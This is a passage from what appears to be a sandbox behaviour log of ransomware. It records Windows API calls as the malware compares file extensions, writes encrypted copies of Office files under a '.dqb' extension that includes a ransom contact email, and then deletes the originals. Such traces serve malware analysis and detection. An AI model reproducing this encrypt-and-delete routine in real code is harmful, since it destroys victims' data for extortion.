[0039.836] lstrlenW (lpString=".zip") returned 4 [0039.836] lstrcmpiW (lpString1=".zip", lpString2=".XML") returned 1 [0039.836] lstrlenW (lpString=".rar") returned 4 [0039.836] lstrcmpiW (lpString1=".rar", lpString2=".XML") returned -1 [0039.836] lstrlenW (lpString=".bz2") returned 4 [0039.836] lstrcmpiW (lpString1=".bz2", lpString2=".XML") returned -1 [0039.836] lstrlenW (lpString=".7z") returned 3 [0039.836] lstrcmpiW (lpString1=".7z", lpString2="XML") returned -1 [0039.836] lstrlenW (lpString="C:\\Program Files\\Common Files\\Microsoft Shared\\OFFICE14\\Office Setup Controller\\Proof.es\\Proof.XML") returned 98 [0039.836] lstrlenW (lpString=".dbf") returned 4 [0039.836] lstrcmpiW (lpString1=".dbf", lpString2=".XML") returned -1 [0039.836] lstrlenW (lpString="C:\\Program Files\\Common Files\\Microsoft Shared\\OFFICE14\\Office Setup Controller\\Proof.es\\Proof.XML") returned 98 [0039.836] lstrlenW (lpString=".1cd") returned 4 [0039.836] lstrcmpiW (lpString1=".1cd", lpString2=".XML") returned -1 [0039.836] lstrlenW (lpString="C:\\Program Files\\Common Files\\Microsoft Shared\\OFFICE14\\Office Setup Controller\\Proof.es\\Proof.XML") returned 98 [0039.836] lstrlenW (lpString=".jpg") returned 4 [0039.836] lstrcmpiW (lpString1=".jpg", lpString2=".XML") returned -1 [0039.836] lstrlenW (lpString="C:\\Program Files\\Common Files\\Microsoft Shared\\OFFICE14\\Office Setup Controller\\Proof.es\\Proof.XML") returned 98 [0039.836] lstrlenW (lpString="C:\\Program Files\\Common Files\\Microsoft Shared\\OFFICE14\\Office Setup Controller\\Proof.es\\Proof.XML") returned 98 [0039.836] lstrlenW (lpString=".doc") returned 4 [0039.836] lstrcmpiW (lpString1=".doc", lpString2=".XML") returned -1 [0039.836] lstrlenW (lpString=".docx") returned 5 [0039.836] lstrcmpiW (lpString1=".docx", lpString2="f.XML") returned -1 [0039.836] lstrlenW (lpString=".pdf") returned 4 [0039.836] lstrcmpiW (lpString1=".pdf", lpString2=".XML") returned -1 [0039.836] lstrlenW (lpString=".xls") returned 4 [0039.836] lstrcmpiW (lpString1=".xls", lpString2=".XML") returned -1 [0039.836] lstrlenW (lpString=".xlsx") returned 5 [0039.836] lstrcmpiW (lpString1=".xlsx", lpString2="f.XML") returned -1 [0039.836] lstrlenW (lpString=".ppt") returned 4 [0039.836] lstrcmpiW (lpString1=".ppt", lpString2=".XML") returned -1 [0039.836] lstrlenW (lpString="C:\\Program Files\\Common Files\\Microsoft Shared\\OFFICE14\\Office Setup Controller\\Proof.es\\Proof.XML") returned 98 [0039.836] lstrlenW (lpString=".zip") returned 4 [0039.837] lstrcmpiW (lpString1=".zip", lpString2=".XML") returned 1 [0039.837] lstrlenW (lpString=".rar") returned 4 [0039.837] lstrcmpiW (lpString1=".rar", lpString2=".XML") returned -1 [0039.837] lstrlenW (lpString=".bz2") returned 4 [0039.837] lstrcmpiW (lpString1=".bz2", lpString2=".XML") returned -1 [0039.837] lstrlenW (lpString=".7z") returned 3 [0039.837] lstrcmpiW (lpString1=".7z", lpString2="XML") returned -1 [0039.837] lstrlenW (lpString="C:\\Program Files\\Common Files\\Microsoft Shared\\OFFICE14\\Office Setup Controller\\Proof.es\\Proof.XML") returned 98 [0039.837] lstrlenW (lpString=".dbf") returned 4 [0039.837] lstrcmpiW (lpString1=".dbf", lpString2=".XML") returned -1 [0039.837] lstrlenW (lpString="C:\\Program Files\\Common Files\\Microsoft Shared\\OFFICE14\\Office Setup Controller\\Proof.es\\Proof.XML") returned 98 [0039.837] lstrlenW (lpString=".1cd") returned 4 [0039.837] lstrcmpiW (lpString1=".1cd", lpString2=".XML") returned -1 [0039.837] lstrlenW (lpString="C:\\Program Files\\Common Files\\Microsoft Shared\\OFFICE14\\Office Setup Controller\\Proof.es\\Proof.XML") returned 98 [0039.837] lstrlenW (lpString=".jpg") returned 4 [0039.837] lstrcmpiW (lpString1=".jpg", lpString2=".XML") returned -1 [0039.837] lstrcmpiW (lpString1=".XML", lpString2=".dqb") returned 1 [0039.837] lstrlenW (lpString="Proof.XML") returned 9 [0039.837] CreateFileW (lpFileName="C:\\Program Files\\Common Files\\Microsoft Shared\\OFFICE14\\Office Setup Controller\\Proof.fr\\Proof.XML" (normalized: "c:\\program files\\common files\\microsoft shared\\office14\\office setup controller\\proof.fr\\proof.xml"), dwDesiredAccess=0x80000000, dwShareMode=0x3, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x1a4 [0039.837] GetFileSizeEx (in: hFile=0x1a4, lpFileSize=0x227ff1c | out: lpFileSize=0x227ff1c*=1458) returned 1 [0039.837] CloseHandle (hObject=0x1a4) returned 1 [0039.838] GetFileAttributesW (lpFileName="C:\\Program Files\\Common Files\\Microsoft Shared\\OFFICE14\\Office Setup Controller\\Proof.fr\\Proof.XML" (normalized: "c:\\program files\\common files\\microsoft shared\\office14\\office setup controller\\proof.fr\\proof.xml")) returned 0x20 [0039.838] GetFileAttributesW (lpFileName="C:\\Program Files\\Common Files\\Microsoft Shared\\OFFICE14\\Office Setup Controller\\Proof.fr\\Proof.XML.id-9C354B42.[btcdecoding@qq.com].dqb" (normalized: "c:\\program files\\common files\\microsoft shared\\office14\\office setup controller\\proof.fr\\proof.xml.id-9c354b42.[btcdecoding@qq.com].dqb")) returned 0xffffffff [0039.838] CreateFileW (lpFileName="C:\\Program Files\\Common Files\\Microsoft Shared\\OFFICE14\\Office Setup Controller\\Proof.fr\\Proof.XML" (normalized: "c:\\program files\\common files\\microsoft shared\\office14\\office setup controller\\proof.fr\\proof.xml"), dwDesiredAccess=0xc0000000, dwShareMode=0x3, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x1a4 [0039.838] SetFilePointerEx (in: hFile=0x1a4, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x227fec8 | out: lpNewFilePointer=0x0) returned 1 [0039.838] SetFilePointerEx (in: hFile=0x1a4, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x227fec8 | out: lpNewFilePointer=0x0) returned 1 [0039.838] CreateFileW (lpFileName="C:\\Program Files\\Common Files\\Microsoft Shared\\OFFICE14\\Office Setup Controller\\Proof.fr\\Proof.XML.id-9C354B42.[btcdecoding@qq.com].dqb" (normalized: "c:\\program files\\common files\\microsoft shared\\office14\\office setup controller\\proof.fr\\proof.xml.id-9c354b42.[btcdecoding@qq.com].dqb"), dwDesiredAccess=0x40000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x2, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x200 [0039.838] GetLastError () returned 0x0 [0039.838] ReadFile (in: hFile=0x1a4, lpBuffer=0x3540020, nNumberOfBytesToRead=0xffff0, lpNumberOfBytesRead=0x227fed4, lpOverlapped=0x0 | out: lpBuffer=0x3540020*, lpNumberOfBytesRead=0x227fed4*=0x5b2, lpOverlapped=0x0) returned 1 [0039.839] WriteFile (in: hFile=0x200, lpBuffer=0x3540020*, nNumberOfBytesToWrite=0x5c0, lpNumberOfBytesWritten=0x227fc9c, lpOverlapped=0x0 | out: lpBuffer=0x3540020*, lpNumberOfBytesWritten=0x227fc9c*=0x5c0, lpOverlapped=0x0) returned 1 [0039.840] ReadFile (in: hFile=0x1a4, lpBuffer=0x3540020, nNumberOfBytesToRead=0xffff0, lpNumberOfBytesRead=0x227fed4, lpOverlapped=0x0 | out: lpBuffer=0x3540020*, lpNumberOfBytesRead=0x227fed4*=0x0, lpOverlapped=0x0) returned 1 [0039.840] WriteFile (in: hFile=0x200, lpBuffer=0x3540020*, nNumberOfBytesToWrite=0xe6, lpNumberOfBytesWritten=0x227fc9c, lpOverlapped=0x0 | out: lpBuffer=0x3540020*, lpNumberOfBytesWritten=0x227fc9c*=0xe6, lpOverlapped=0x0) returned 1 [0039.840] SetEndOfFile (hFile=0x200) returned 1 [0039.841] CloseHandle (hObject=0x200) returned 1 [0039.841] SetFilePointerEx (in: hFile=0x1a4, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x227fec8 | out: lpNewFilePointer=0x0) returned 1 [0039.841] SetEndOfFile (hFile=0x1a4) returned 1 [0039.844] CloseHandle (hObject=0x1a4) returned 1 [0039.844] SetFileAttributesW (lpFileName="C:\\Program Files\\Common Files\\Microsoft Shared\\OFFICE14\\Office Setup Controller\\Proof.fr\\Proof.XML.id-9C354B42.[btcdecoding@qq.com].dqb", dwFileAttributes=0x20) returned 1 [0039.844] DeleteFileW (lpFileName="C:\\Program Files\\Common Files\\Microsoft Shared\\OFFICE14\\Office Setup Controller\\Proof.fr\\Proof.XML" (normalized: "c:\\program files\\common files\\microsoft shared\\office14\\office setup controller\\proof.fr\\proof.xml")) returned 1 [0039.845] lstrlenW (lpString="C:\\Program Files\\Common Files\\Microsoft Shared\\OFFICE14\\Office Setup Controller\\Proof.fr\\Proof.XML") returned 98 [0039.845] lstrlenW (lpString="C:\\Program Files\\Common Files\\Microsoft Shared\\OFFICE14\\Office Setup Controller\\Proof.fr\\Proof.XML") returned 98 [0039.845] lstrlenW (lpString=".doc") returned 4 [0039.845] lstrcmpiW (lpString1=".doc", lpString2=".XML") returned -1 [0039.845] lstrlenW (lpString=".docx") returned 5 [0039.845] lstrcmpiW (lpString1=".docx", lpString2="f.XML") returned -1 [0039.845] lstrlenW (lpString=".pdf") returned 4 [0039.845] lstrcmpiW (lpString1=".pdf", lpString2=".XML") returned -1 [0039.845] lstrlenW (lpString=".xls") returned 4 [0039.845] lstrcmpiW (lpString1=".xls", lpString2=".XML") returned -1 [0039.845] lstrlenW (lpString=".xlsx") returned 5 [0039.845] lstrcmpiW (lpString1=".xlsx", lpString2="f.XML") returned -1 [0039.845] lstrlenW (lpString=".ppt") returned 4 [0039.845] lstrcmpiW (lpString1=".ppt", lpString2=".XML") returned -1 [0039.845] lstrlenW (lpString="C:\\Program Files\\Common Files\\Microsoft Shared\\OFFICE14\\Office Setup Controller\\Proof.fr\\Proof.XML") returned 98 [0039.845] lstrlenW (lpString=".zip") returned 4 [0039.845] lstrcmpiW (lpString1=".zip", lpString2=".XML") returned 1 [0039.845] lstrlenW (lpString=".rar") returned 4 [0039.845] lstrcmpiW (lpString1=".rar", lpString2=".XML") returned -1 [0039.845] lstrlenW (lpString=".bz2") returned 4 [0039.845] lstrcmpiW (lpString1=".bz2", lpString2=".XML") returned -1 [0039.845] lstrlenW (lpString=".7z") returned 3 [0039.845] lstrcmpiW (lpString1=".7z", lpString2="XML") returned -1 [0039.845] lstrlenW (lpString="C:\\Program Files\\Common Files\\Microsoft Shared\\OFFICE14\\Office Setup Controller\\Proof.fr\\Proof.XML") returned 98 [0039.845] lstrlenW (lpString=".dbf") returned 4 [0039.845] lstrcmpiW (lpString1=".dbf", lpString2=".XML") returned -1 [0039.845] lstrlenW (lpString="C:\\Program Files\\Common Files\\Microsoft Shared\\OFFICE14\\Office Setup Controller\\Proof.fr\\Proof.XML") returned 98 [0039.845] lstrlenW (lpString=".1cd") returned 4 [0039.845] lstrcmpiW (lpString1=".1cd", lpString2=".XML") returned -1 [0039.845] lstrlenW (lpString="C:\\Program Files\\Common Files\\Microsoft Shared\\OFFICE14\\Office Setup Controller\\Proof.fr\\Proof.XML") returned 98 [0039.845] lstrlenW (lpString=".jpg") returned 4 [0039.845] lstrcmpiW (lpString1=".jpg", lpString2=".XML") returned -1 [0039.846] lstrlenW (lpString="C:\\Program Files\\Common Files\\Microsoft Shared\\OFFICE14\\Office Setup Controller\\Proof.fr\\Proof.XML") returned 98 [0039.846] lstrlenW (lpString="C:\\Program Files\\Common Files\\Microsoft Shared\\OFFICE14\\Office Setup Controller\\Proof.fr\\Proof.XML") returned 98 [0039.846] lstrlenW (lpString=".doc") returned 4 [0039.846] lstrcmpiW (lpString1=".doc", lpString2=".XML") returned -1 [0039.846] lstrlenW (lpString=".docx") returned 5 [0039.846] lstrcmpiW (lpString1=".docx", lpString2="f.XML") returned -1 [0039.846] lstrlenW (lpString=".pdf") returned 4 [0039.846] lstrcmpiW (lpString1=".pdf", lpString2=".XML") returned -1 [0039.846] lstrlenW (lpString=".xls") returned 4 [0039.846] lstrcmpiW (lpString1=".xls", lpString2=".XML") returned -1 [0039.846] lstrlenW (lpString=".xlsx") returned 5 [0039.846] lstrcmpiW (lpString1=".xlsx", lpString2="f.XML") returned -1 [0039.846] lstrlenW (lpString=".ppt") returned 4 [0039.846] lstrcmpiW (lpString1=".ppt", lpString2=".XML") returned -1 [0039.846] lstrlenW (lpString="C:\\Program Files\\Common Files\\Microsoft Shared\\OFFICE14\\Office Setup Controller\\Proof.fr\\Proof.XML") returned 98 [0039.846] lstrlenW (lpString=".zip") returned 4 [0039.846] lstrcmpiW (lpString1=".zip", lpString2=".XML") returned 1 [0039.846] lstrlenW (lpString=".rar") returned 4 [0039.846] lstrcmpiW (lpString1=".rar", lpString2=".XML") returned -1 [0039.846] lstrlenW (lpString=".bz2") returned 4 [0039.846] lstrcmpiW (lpString1=".bz2", lpString2=".XML") returned -1 [0039.846] lstrlenW (lpString=".7z") returned 3 [0039.846] lstrcmpiW (lpString1=".7z", lpString2="XML") returned -1 [0039.846] lstrlenW (lpString="C:\\Program Files\\Common Files\\Microsoft Shared\\OFFICE14\\Office Setup Controller\\Proof.fr\\Proof.XML") returned 98 [0039.846] lstrlenW (lpString=".dbf") returned 4 [0039.846] lstrcmpiW (lpString1=".dbf", lpString2=".XML") returned -1 [0039.846] lstrlenW (lpString="C:\\Program Files\\Common Files\\Microsoft Shared\\OFFICE14\\Office Setup Controller\\Proof.fr\\Proof.XML") returned 98 [0039.846] lstrlenW (lpString=".1cd") returned 4 [0039.846] lstrcmpiW (lpString1=".1cd", lpString2=".XML") returned -1 [0039.846] lstrlenW (lpString="C:\\Program Files\\Common Files\\Microsoft Shared\\OFFICE14\\Office Setup Controller\\Proof.fr\\Proof.XML") returned 98 [0039.846] lstrlenW (lpString=".jpg") returned 4 [0039.846] lstrcmpiW (lpString1=".jpg", lpString2=".XML") returned -1 [0039.847] lstrcmpiW (lpString1=".XML", lpString2=".dqb") returned 1 [0039.847] lstrlenW (lpString="Proofing.XML") returned 12 [0039.847] CreateFileW (lpFileName="C:\\Program Files\\Common Files\\Microsoft Shared\\OFFICE14\\Office Setup Controller\\Proofing.en-us\\Proofing.XML" (normalized: "c:\\program files\\common files\\microsoft shared\\office14\\office setup controller\\proofing.en-us\\proofing.xml"), dwDesiredAccess=0x80000000, dwShareMode=0x3, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x1f8 [0040.145] GetFileSizeEx (in: hFile=0x1f8, lpFileSize=0x227ff1c | out: lpFileSize=0x227ff1c*=811) returned 1 [0040.145] CloseHandle (hObject=0x1f8) returned 1 [0040.145] GetFileAttributesW (lpFileName="C:\\Program Files\\Common Files\\Microsoft Shared\\OFFICE14\\Office Setup Controller\\Proofing.en-us\\Proofing.XML" (normalized: "c:\\program files\\common files\\microsoft shared\\office14\\office setup controller\\proofing.en-us\\proofing.xml")) returned 0x20 [0040.145] GetFileAttributesW (lpFileName="C:\\Program Files\\Common Files\\Microsoft Shared\\OFFICE14\\Office Setup Controller\\Proofing.en-us\\Proofing.XML.id-9C354B42.[btcdecoding@qq.com].dqb" (normalized: "c:\\program files\\common files\\microsoft shared\\office14\\office setup controller\\proofing.en-us\\proofing.xml.id-9c354b42.[btcdecoding@qq.com].dqb")) returned 0xffffffff [0040.145] CreateFileW (lpFileName="C:\\Program Files\\Common Files\\Microsoft Shared\\OFFICE14\\Office Setup Controller\\Proofing.en-us\\Proofing.XML" (normalized: "c:\\program files\\common files\\microsoft shared\\office14\\office setup controller\\proofing.en-us\\proofing.xml"), dwDesiredAccess=0xc0000000, dwShareMode=0x3, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x1f8 [0040.145] SetFilePointerEx (in: hFile=0x1f8, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x227fec8 | out: lpNewFilePointer=0x0) returned 1 [0040.145] SetFilePointerEx (in: hFile=0x1f8, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x227fec8 | out: lpNewFilePointer=0x0) returned 1 [0040.145] CreateFileW (lpFileName="C:\\Program Files\\Common Files\\Microsoft Shared\\OFFICE14\\Office Setup Controller\\Proofing.en-us\\Proofing.XML.id-9C354B42.[btcdecoding@qq.com].dqb" (normalized: "c:\\program files\\common files\\microsoft shared\\office14\\office setup controller\\proofing.en-us\\proofing.xml.id-9c354b42.[btcdecoding@qq.com].dqb"), dwDesiredAccess=0x40000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x2, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x1fc [0040.146] GetLastError () returned 0x0 [0040.146] ReadFile (in: hFile=0x1f8, lpBuffer=0x3540020, nNumberOfBytesToRead=0xffff0, lpNumberOfBytesRead=0x227fed4, lpOverlapped=0x0 | out: lpBuffer=0x3540020*, lpNumberOfBytesRead=0x227fed4*=0x32b, lpOverlapped=0x0) returned 1 [0040.267] WriteFile (in: hFile=0x1fc, lpBuffer=0x3540020*, nNumberOfBytesToWrite=0x330, lpNumberOfBytesWritten=0x227fc9c, lpOverlapped=0x0 | out: lpBuffer=0x3540020*, lpNumberOfBytesWritten=0x227fc9c*=0x330, lpOverlapped=0x0) returned 1 [0040.268] ReadFile (in: hFile=0x1f8, lpBuffer=0x3540020, nNumberOfBytesToRead=0xffff0, lpNumberOfBytesRead=0x227fed4, lpOverlapped=0x0 | out: lpBuffer=0x3540020*, lpNumberOfBytesRead=0x227fed4*=0x0, lpOverlapped=0x0) returned 1 [0040.268] WriteFile (in: hFile=0x1fc, lpBuffer=0x3540020*, nNumberOfBytesToWrite=0xec, lpNumberOfBytesWritten=0x227fc9c, lpOverlapped=0x0 | out: lpBuffer=0x3540020*, lpNumberOfBytesWritten=0x227fc9c*=0xec, lpOverlapped=0x0) returned 1 [0040.268] SetEndOfFile (hFile=0x1fc) returned 1 [0040.508] CloseHandle (hObject=0x1fc) returned 1 [0040.509] SetFilePointerEx (in: hFile=0x1f8, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x227fec8 | out: lpNewFilePointer=0x0) returned 1 [0040.509] SetEndOfFile (hFile=0x1f8) returned 1 [0040.509] CloseHandle (hObject=0x1f8) returned 1 [0040.509] SetFileAttributesW (lpFileName="C:\\Program Files\\Common Files\\Microsoft Shared\\OFFICE14\\Office Setup Controller\\Proofing.en-us\\Proofing.XML.id-9C354B42.[btcdecoding@qq.com].dqb", dwFileAttributes=0x20) returned 1 [0040.510] DeleteFileW (lpFileName="C:\\Program Files\\Common Files\\Microsoft Shared\\OFFICE14\\Office Setup Controller\\Proofing.en-us\\Proofing.XML" (normalized: "c:\\program files\\common files\\microsoft shared\\office14\\office setup controller\\proofing.en-us\\proofing.xml")) returned 1 [0040.510] lstrlenW (lpString="C:\\Program Files\\Common Files\\Microsoft Shared\\OFFICE14\\Office Setup Controller\\Proofing.en-us\\Proofing.XML") returned 107 [0040.510] lstrlenW (lpString="C:\\Program Files\\Common Files\\Microsoft Shared\\OFFICE14\\Office Setup Controller\\Proofing.en-us\\Proofing.XML") returned 107 [0040.510] lstrlenW (lpString=".doc") returned 4 [0040.510] lstrcmpiW (lpString1=".doc", lpString2=".XML") returned -1 [0040.510] lstrlenW (lpString=".docx") returned 5 [0040.510] lstrcmpiW (lpString1=".docx", lpString2="g.XML") returned -1 [0040.510] lstrlenW (lpString=".pdf") returned 4 [0040.510] lstrcmpiW (lpString1=".pdf", lpString2=".XML") returned -1 [0040.510] lstrlenW (lpString=".xls") returned 4 [0040.510] lstrcmpiW (lpString1=".xls", lpString2=".XML") returned -1 [0040.510] lstrlenW (lpString=".xlsx") returned 5 [0040.510] lstrcmpiW (lpString1=".xlsx", lpString2="g.XML") returned -1 [0040.510] lstrlenW (lpString=".ppt") returned 4 [0040.510] lstrcmpiW (lpString1=".ppt", lpString2=".XML") returned -1 [0040.510] lstrlenW (lpString="C:\\Program Files\\Common Files\\Microsoft Shared\\OFFICE14\\Office Setup Controller\\Proofing.en-us\\Proofing.XML") returned 107 [0040.510] lstrlenW (lpString=".zip") returned 4 [0040.510] lstrcmpiW (lpString1=".zip", lpString2=".XML") returned 1 [0040.510] lstrlenW (lpString=".rar") returned 4 [0040.510] lstrcmpiW (lpString1=".rar", lpString2=".XML") returned -1 [0040.510] lstrlenW (lpString=".bz2") returned 4 [0040.510] lstrcmpiW (lpString1=".bz2", lpString2=".XML") returned -1 [0040.510] lstrlenW (lpString=".7z") returned 3 [0040.511] lstrcmpiW (lpString1=".7z", lpString2="XML") returned -1 [0040.511] lstrlenW (lpString="C:\\Program Files\\Common Files\\Microsoft Shared\\OFFICE14\\Office Setup Controller\\Proofing.en-us\\Proofing.XML") returned 107 [0040.511] lstrlenW (lpString=".dbf") returned 4 [0040.511] lstrcmpiW (lpString1=".dbf", lpString2=".XML") returned -1 [0040.511] lstrlenW (lpString="C:\\Program Files\\Common Files\\Microsoft Shared\\OFFICE14\\Office Setup Controller\\Proofing.en-us\\Proofing.XML") returned 107 [0040.511] lstrlenW (lpString=".1cd") returned 4 [0040.511] lstrcmpiW (lpString1=".1cd", lpString2=".XML") returned -1 [0040.511] lstrlenW (lpString="C:\\Program Files\\Common Files\\Microsoft Shared\\OFFICE14\\Office Setup Controller\\Proofing.en-us\\Proofing.XML") returned 107 [0040.511] lstrlenW (lpString=".jpg") returned 4 [0040.511] lstrcmpiW (lpString1=".jpg", lpString2=".XML") returned -1 [0040.511] lstrlenW (lpString="C:\\Program Files\\Common Files\\Microsoft Shared\\OFFICE14\\Office Setup Controller\\Proofing.en-us\\Proofing.XML") returned 107 [0040.511] lstrlenW (lpString="C:\\Program Files\\Common Files\\Microsoft Shared\\OFFICE14\\Office Setup Controller\\Proofing.en-us\\Proofing.XML") returned 107 [0040.511] lstrlenW (lpString=".doc") returned 4 [0040.511] lstrcmpiW (lpString1=".doc", lpString2=".XML") returned -1 [0040.511] lstrlenW (lpString=".docx") returned 5 [0040.511] lstrcmpiW (lpString1=".docx", lpString2="g.XML") returned -1 [0040.511] lstrlenW (lpString=".pdf") returned 4 [0040.511] lstrcmpiW (lpString1=".pdf", lpString2=".XML") returned -1 [0040.511] lstrlenW (lpString=".xls") returned 4 [0040.511] lstrcmpiW (lpString1=".xls", lpString2=".XML") returned -1 [0040.511] lstrlenW (lpString=".xlsx") returned 5 [0040.511] lstrcmpiW (lpString1=".xlsx", lpString2="g.XML") returned -1 [0040.511] lstrlenW (lpString=".ppt") returned 4 [0040.511] lstrcmpiW (lpString1=".ppt", lpString2=".XML") returned -1 [0040.511] lstrlenW (lpString="C:\\Program Files\\Common Files\\Microsoft Shared\\OFFICE14\\Office Setup Controller\\Proofing.en-us\\Proofing.XML") returned 107 [0040.511] lstrlenW (lpString=".zip") returned 4 [0040.511] lstrcmpiW (lpString1=".zip", lpString2=".XML") returned 1 [0040.511] lstrlenW (lpString=".rar") returned 4 [0040.511] lstrcmpiW (lpString1=".rar", lpString2=".XML") returned -1 [0040.511] lstrlenW (lpString=".bz2") returned 4 [0040.511] lstrcmpiW (lpString1=".bz2", lpString2=".XML") returned -1 [0040.511] lstrlenW (lpString=".7z") returned 3 [0040.511] lstrcmpiW (lpString1=".7z", lpString2="XML") returned -1 [0040.511] lstrlenW (lpString="C:\\Program Files\\Common Files\\Microsoft Shared\\OFFICE14\\Office Setup Controller\\Proofing.en-us\\Proofing.XML") returned 107 [0040.511] lstrlenW (lpString=".dbf") returned 4 [0040.512] lstrcmpiW (lpString1=".dbf", lpString2=".XML") returned -1 [0040.512] lstrlenW (lpString="C:\\Program Files\\Common Files\\Microsoft Shared\\OFFICE14\\Office Setup Controller\\Proofing.en-us\\Proofing.XML") returned 107 [0040.512] lstrlenW (lpString=".1cd") returned 4 [0040.512] lstrcmpiW (lpString1=".1cd", lpString2=".XML") returned -1 [0040.512] lstrlenW (lpString="C:\\Program Files\\Common Files\\Microsoft Shared\\OFFICE14\\Office Setup Controller\\Proofing.en-us\\Proofing.XML") returned 107 [0040.512] lstrlenW (lpString=".jpg") returned 4 [0040.512] lstrcmpiW (lpString1=".jpg", lpString2=".XML") returned -1 [0040.512] lstrcmpiW (lpString1=".HTM", lpString2=".dqb") returned 1 [0040.512] lstrlenW (lpString="MCABOUT.HTM") returned 11 [0040.512] CreateFileW (lpFileName="C:\\Program Files\\Common Files\\Microsoft Shared\\Smart Tag\\1033\\MCABOUT.HTM" (normalized: "c:\\program files\\common files\\microsoft shared\\smart tag\\1033\\mcabout.htm"), dwDesiredAccess=0x80000000, dwShareMode=0x3, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x1f8 [0040.513] GetFileSizeEx (in: hFile=0x1f8, lpFileSize=0x227ff1c | out: lpFileSize=0x227ff1c*=11463) returned 1 [0040.513] CloseHandle (hObject=0x1f8) returned 1 [0040.513] GetFileAttributesW (lpFileName="C:\\Program Files\\Common Files\\Microsoft Shared\\Smart Tag\\1033\\MCABOUT.HTM" (normalized: "c:\\program files\\common files\\microsoft shared\\smart tag\\1033\\mcabout.htm")) returned 0x20 [0040.513] GetFileAttributesW (lpFileName="C:\\Program Files\\Common Files\\Microsoft Shared\\Smart Tag\\1033\\MCABOUT.HTM.id-9C354B42.[btcdecoding@qq.com].dqb" (normalized: "c:\\program files\\common files\\microsoft shared\\smart tag\\1033\\mcabout.htm.id-9c354b42.[btcdecoding@qq.com].dqb")) returned 0xffffffff [0040.513] CreateFileW (lpFileName="C:\\Program Files\\Common Files\\Microsoft Shared\\Smart Tag\\1033\\MCABOUT.HTM" (normalized: "c:\\program files\\common files\\microsoft shared\\smart tag\\1033\\mcabout.htm"), dwDesiredAccess=0xc0000000, dwShareMode=0x3, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x1f8 [0040.513] SetFilePointerEx (in: hFile=0x1f8, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x227fec8 | out: lpNewFilePointer=0x0) returned 1 [0040.513] SetFilePointerEx (in: hFile=0x1f8, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x227fec8 | out: lpNewFilePointer=0x0) returned 1 [0040.513] CreateFileW (lpFileName="C:\\Program Files\\Common Files\\Microsoft Shared\\Smart Tag\\1033\\MCABOUT.HTM.id-9C354B42.[btcdecoding@qq.com].dqb" (normalized: "c:\\program files\\common files\\microsoft shared\\smart tag\\1033\\mcabout.htm.id-9c354b42.[btcdecoding@qq.com].dqb"), dwDesiredAccess=0x40000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x2, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x1fc [0040.515] GetLastError () returned 0x0 [0040.515] ReadFile (in: hFile=0x1f8, lpBuffer=0x3540020, nNumberOfBytesToRead=0xffff0, lpNumberOfBytesRead=0x227fed4, lpOverlapped=0x0 | out: lpBuffer=0x3540020*, lpNumberOfBytesRead=0x227fed4*=0x2cc7, lpOverlapped=0x0) returned 1 [0040.516] WriteFile (in: hFile=0x1fc, lpBuffer=0x3540020*, nNumberOfBytesToWrite=0x2cd0, lpNumberOfBytesWritten=0x227fc9c, lpOverlapped=0x0 | out: lpBuffer=0x3540020*, lpNumberOfBytesWritten=0x227fc9c*=0x2cd0, lpOverlapped=0x0) returned 1 [0040.517] ReadFile (in: hFile=0x1f8, lpBuffer=0x3540020, nNumberOfBytesToRead=0xffff0, lpNumberOfBytesRead=0x227fed4, lpOverlapped=0x0 | out: lpBuffer=0x3540020*, lpNumberOfBytesRead=0x227fed4*=0x0, lpOverlapped=0x0) returned 1 [0040.517] WriteFile (in: hFile=0x1fc, lpBuffer=0x3540020*, nNumberOfBytesToWrite=0xea, lpNumberOfBytesWritten=0x227fc9c, lpOverlapped=0x0 | out: lpBuffer=0x3540020*, lpNumberOfBytesWritten=0x227fc9c*=0xea, lpOverlapped=0x0) returned 1 [0040.517] SetEndOfFile (hFile=0x1fc) returned 1 [0040.517] CloseHandle (hObject=0x1fc) returned 1 [0040.518] SetFilePointerEx (in: hFile=0x1f8, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x227fec8 | out: lpNewFilePointer=0x0) returned 1 [0040.518] SetEndOfFile (hFile=0x1f8) returned 1 [0040.519] CloseHandle (hObject=0x1f8) returned 1 [0040.519] SetFileAttributesW (lpFileName="C:\\Program Files\\Common Files\\Microsoft Shared\\Smart Tag\\1033\\MCABOUT.HTM.id-9C354B42.[btcdecoding@qq.com].dqb", dwFileAttributes=0x20) returned 1 [0040.519] DeleteFileW (lpFileName="C:\\Program Files\\Common Files\\Microsoft Shared\\Smart Tag\\1033\\MCABOUT.HTM" (normalized: "c:\\program files\\common files\\microsoft shared\\smart tag\\1033\\mcabout.htm")) returned 1 [0040.519] lstrlenW (lpString="C:\\Program Files\\Common Files\\Microsoft Shared\\Smart Tag\\1033\\MCABOUT.HTM") returned 73 [0040.519] lstrlenW (lpString="C:\\Program Files\\Common Files\\Microsoft Shared\\Smart Tag\\1033\\MCABOUT.HTM") returned 73 [0040.519] lstrlenW (lpString=".doc") returned 4 [0040.519] lstrcmpiW (lpString1=".doc", lpString2=".HTM") 